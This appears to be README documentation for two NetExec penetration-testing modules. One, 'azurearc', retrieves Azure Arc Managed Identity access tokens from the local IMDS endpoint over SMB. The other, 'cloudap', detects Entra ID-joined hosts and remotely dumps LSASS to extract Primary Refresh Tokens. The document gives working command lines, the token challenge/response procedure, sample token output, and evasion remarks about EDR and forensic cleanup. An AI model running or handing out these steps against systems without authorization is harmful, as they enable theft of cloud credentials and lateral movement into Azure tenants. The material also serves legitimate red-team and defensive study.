Two specialized modules for Azure/Entra ID reconnaissance and credential extraction during penetration testing engagements.
Enumerates Azure Arc presence on Windows targets and, when present, retrieves a Managed Identity access token from the local Arc IMDS endpoint using the documented 401 challenge β .key file β second request flow.
- Protocol: SMB (requires local administrator privileges)
- Primary use case: Rapidly map Arc deployment and obtain a cloud-scoped token for Azure control-plane enumeration during red team engagements.
- Presence check (
CHECK=true): Detects Arc agent by listing well-known install paths. - Token retrieval (default): Executes the IMDS challenge/response locally on the target and returns JSON containing
access_token.
Presence check only:
nxc smb <target> -u <USER> -p <PASS> -M azurearc -o CHECK=trueToken dump:
nxc smb 192.168.1.100 -u USER -p 'PASS' -M azurearc[*] Attempting to retrieve Azure Arc Managed Identity access token [+] Managed Identity token retrieved { "access_token": "eyJhbGciOi......", "expires_on": "1730812345", "token_type": "Bearer", "resource": "https://management.azure.com" } Presence check via SMB listing:
C:\Program Files\AzureConnectedMachineAgent*C:\Program Files (x86)\AzureConnectedMachineAgent*
Token retrieval on target (PowerShell):
- GET
http://localhost:40342/metadata/identity/oauth2/token?resource=...&api-version=...β expect 401 withWWW-Authenticate: Basic realm="<path to .key>" - Read the
.keycontents (requires local admin) - Second GET with
Authorization: Basicto obtain token JSON - Write JSON to temp file, fetch via SMB, and delete the file
- Local admin required on the target (matches Arc's security boundary)
- Tokens are written to a temp file on the target only long enough to read back via SMB, then deleted
- Be mindful of token lifetime and endpoint logging
NSIDE Attack Logic - Azure Arc - Part 1 - Escalation from On-Premises to Cloud
https://www.nsideattacklogic.de/azure-arc-part-1-escalation-from-on-premises-to-cloud/
Detects Azure AD (Entra ID) joined devices and enumerates user profiles with CloudAP/PRT artifacts, then optionally dumps LSASS memory to extract Primary Refresh Tokens (PRTs) for Azure AD authentication bypass.
- Protocol: SMB (pure SMB operations for checks, admin required for dumps)
- Primary use case: Identify Azure AD joined machines, locate users with PRTs, and extract tokens for cloud lateral movement.
- Azure AD join detection (
ACTION=check): Checks device join status via SMB, and enumerates user profiles with TokenBroker/NGC artifacts indicating likely PRT presence - LSASS dump (
ACTION=dump): Remotely dumps LSASS via lsassy, downloads locally, auto-parses CloudAP sections with pypykatz
Check Azure AD join status and scan for user artifacts:
nxc smb <target> -u <USER> -p <PASS> -M cloudap -o ACTION=checkCLOUDAP 10.0.0.1 445 dev-machine1 [+] Device is AzureAdJoined CLOUDAP 10.0.0.1 445 dev-machine1 [*] Scanning user profiles for AzureAD authentication artifacts... CLOUDAP 10.0.0.1 445 dev-machine1 [+] Found 2 user(s) with AzureAD artifacts: CLOUDAP 10.0.0.1 445 dev-machine1 β’ admin.dev-machine1: TokenBroker CLOUDAP 10.0.0.1 445 dev-machine1 β’ brother: TokenBroker Dump LSASS and extract CloudAP credentials:
nxc smb <target> -u <USER> -p <PASS> -M cloudap -o ACTION=dump METHOD=comsvcs SAVE_DIR=.CLOUDAP 10.0.0.1 445 dev-machine1 [+] Dumping LSASS via lsassy (method: comsvcs) CLOUDAP 10.0.0.1 445 dev-machine1 [+] Saved LSASS dump to /root/.nxc/modules/cloudap/10.0.0.1_lsass.dmp CLOUDAP 10.0.0.1 445 dev-machine1 [+] cloudap section #1 (pypykatz): cloudap : PRT : {"Prt":"eyJ0eXAiOi...","ProofOfPossesionKey":"...","TenantId":"..."} DPAPI Key: a1b2c3d4... (sha1: ...) Azure AD join detection (ACTION=check):
- Connects to target via SMB using
C$share - Lists
C$\Users\*directory to enumerate user profiles - For each user, checks existence of Azure AD artifact paths, for example:
AppData\Local\Microsoft\TokenBroker\CacheAppData\Local\Microsoft\Ngc
- Reports users with artifacts (indicating likely PRT presence)
LSASS dump flow (ACTION=dump):
- Uses lsassy to remotely dump LSASS memory (no binary uploads)
- Downloads dump via SMB to local directory
- Auto-parses dump with pypykatz library API
- Extracts CloudAP sections containing PRTs, DPAPI keys, and metadata
- Cleans up remote dump file
- ACTION=dump requires local admin and creates forensic artifacts (LSASS dump)
- Consider EDR detection when dumping LSASS memory
Dirk-jan
https://dirkjanm.io/digging-further-into-the-primary-refresh-token/ https://dirkjanm.io/assets/raw/romhack_dirkjan.pdf
pypykatz
http://github.com/skelsec/pypykatz
lsassy
https://github.com/login-securite/lsassy
Both modules are included in NetExec. Place the files in:
nxc/modules/azurearc.py nxc/modules/cloudap.py azurearc: No additional dependencies
cloudap: Requires lsassy and pypykatz for ACTION=dump
pip install lsassy pypykatzThese modules are part of NetExec and follow the same license.
These tools are for educational purposes only.